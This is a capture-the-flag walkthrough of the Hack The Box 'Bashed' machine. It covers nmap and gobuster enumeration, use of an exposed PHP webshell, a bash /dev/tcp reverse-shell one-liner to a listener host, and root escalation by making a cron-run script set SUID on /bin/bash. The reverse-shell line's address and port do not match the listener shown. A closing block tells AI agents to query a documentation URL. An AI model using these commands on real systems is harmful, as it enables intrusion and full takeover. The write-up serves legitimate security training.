# Bashed ![](/files/nSHT8q5nwMzzwFmsQpZa) ## Enumeration As usual, we start with an nmap scan, in order to find open ports in the target machine. The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file: > nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.68 -oN allPorts * `-sS` use the **TCP SYN** scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections. * `--min-rate 5000` nmap will try to keep the sending rate **at or above** 5000 packets per second. * `-p-` scanning the entire port range, **from 1 to 65535**. * `-T5` **insane** mode, it is the fastest mode of the nmap time template. * `-Pn` assume the host is **online**. * `-n` scan without reverse **DNS** resolution. * `-oN` **save** the scan result into a file, in this case the *allports* file. ``` # Nmap 7.92 scan initiated Mon Mar 7 21:31:10 2022 as: nmap -sS -p- -T5 --min-rate 5000 -n -Pn -oN allPorts 10.10.10.68 Warning: 10.10.10.68 giving up on port because retransmission cap hit (2). Nmap scan report for 10.10.10.68 Host is up (0.065s latency). Not shown: 65534 closed tcp ports (reset) PORT STATE SERVICE 80/tcp open http # Nmap done at Mon Mar 7 21:31:26 2022 -- 1 IP address (1 host up) scanned in 16.14 seconds ``` As we see, only port 80 (*HTTP*) is open. Let's try to obtain more information about the service and version running on that port. > nmap -sC -sV -p80 10.10.10.68 -oN targeted * `-sC` performs the scan using the default set of **scripts**. * `-sV` enables **version** detection. * `-oN` **save** the scan result into file, in this case the *targeted* file. ``` # Nmap 7.92 scan initiated Mon Mar 7 21:32:12 2022 as: nmap -sCV -p80 -oN targeted 10.10.10.68 Nmap scan report for 10.10.10.68 Host is up (0.037s latency). PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-title: Arrexel's Development Site |_http-server-header: Apache/2.4.18 (Ubuntu) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Mon Mar 7 21:32:21 2022 -- 1 IP address (1 host up) scanned in 8.98 seconds ``` Let's take a look at the website. ![](/files/Nh49hCBWCnYn10wVxar5) Doesn't have much going on. Let's enumerate directories with *gobuster*. > gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 200 * `dir` enumerates **directories or files**. * `-u` the **target** URL. * `-w` path to the **wordlist**. * `-t` number of current **threads**, in this case 200 threads. ``` =============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.10.68 [+] Method: GET [+] Threads: 200 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Timeout: 10s =============================================================== 2022/03/07 21:44:27 Starting gobuster in directory enumeration mode =============================================================== /php (Status: 301) [Size: 308] [--> http://10.10.10.68/php/] /css (Status: 301) [Size: 308] [--> http://10.10.10.68/css/] /dev (Status: 301) [Size: 308] [--> http://10.10.10.68/dev/] /js (Status: 301) [Size: 307] [--> http://10.10.10.68/js/] /fonts (Status: 301) [Size: 310] [--> http://10.10.10.68/fonts/] /images (Status: 301) [Size: 311] [--> http://10.10.10.68/images/] /server-status (Status: 403) [Size: 299] =============================================================== 2022/03/07 21:46:17 Finished =============================================================== ``` ## Exploitation If we take a look at the `/dev` directory, we should see a few *PHP* files. ![](/files/CCVdGc9ENIdmRc3ivBtt) If we click on the `phpbash.php` file, basically we will find a webshell. ![](/files/RS4UJQTxHtwhRtiTArqN) Let's get a reverse shell. First, let's set a *netcat* listener on port *4444*. > nc -lvnp 4444 * `-l` **listen** mode. * `-v` **verbose** mode. * `-n` **numeric-only** IP, no DNS resolution. * `-p` specify the **port** to listen on. Then on the webshell we'll have to execute the following to get a shell and be able to get the user flag. > bash -c "bash -i >%26 /dev/tcp/10.0.0.1/8080 0>%261" ``` listening on [any] 4444 ... connect to [10.10.14.11] from (UNKNOWN) [10.10.10.68] 39324 bash: cannot set terminal process group (762): Inappropriate ioctl for device bash: no job control in this shell bash-4.3$ whoami whoami www-data bash-4.3$ cat /home/arrexel/user.txt cat /home/arrexel/user.txt 2c281f318555dbc1b856957c7147bfc1 ``` ## Privilege Escalation Let's start the privilege escalation phase by listing the *sudo* privileges of the `www-data` user. > sudo -l * `-l` list user **privileges**. ``` Matching Defaults entries for www-data on bashed: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User www-data may run the following commands on bashed: (scriptmanager : scriptmanager) NOPASSWD: ALL ``` We can execute any command as the `scriptmanager` user. Let's get a shell as the `scriptmanager` user. > sudo -u scriptmanager bash ``` bash-4.3$ whoami whoami scriptmanager ``` If we list the files that have `scriptmanager` as owner user, we will see the `test.py` file in the `/scripts` folder. And if we look inside the folder, we'll see another file owned by `root`. > ls -l /script ``` total 8 -rw-r--r-- 1 scriptmanager scriptmanager 43 Mar 7 13:49 test.py -rw-r--r-- 1 root root 12 Mar 7 13:48 test.txt ``` Let's see the content of the `test.py` and `test.txt` file. > cat /scripts/test.py ```python f = open("test.txt", "w") f.write("testing 123!") f.close ``` > cat /scripts/test.txt ``` testing 123! ``` There must be some sort of scheduled task executed by `root` which runs the `test.py` script. The idea here is to change the `/scripts/test.py` script and make it give the `/bin/bash` binary the *SUID* permission, so when `root` executes it, *bash* permissions will change. > nano /scripts/test.py ```python import os os.system("chmod +s /bin/bash") ``` Now all we have to do is wait until the `/bin/bash` binary has the *SUID* permission activated. > ls -l ``` -rwsr-sr-x 1 root root 1037528 Jun 24 2016 /bin/bash ``` Finally, all we have to do is execute *bash* with the owner permissions, and reap the harvest and take the root flag. > bash -p ``` bash-4.3# whoami root bash-4.3# cat /root/root.txt cc4f0afe3a1026d402ba10329674a8e2 ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://alfa8sa.gitbook.io/htb-writeups/linux-machines/bashed.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.